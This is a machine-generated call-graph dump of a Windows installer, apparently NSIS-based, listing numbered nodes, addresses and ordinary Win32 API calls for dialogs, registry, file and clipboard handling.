3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 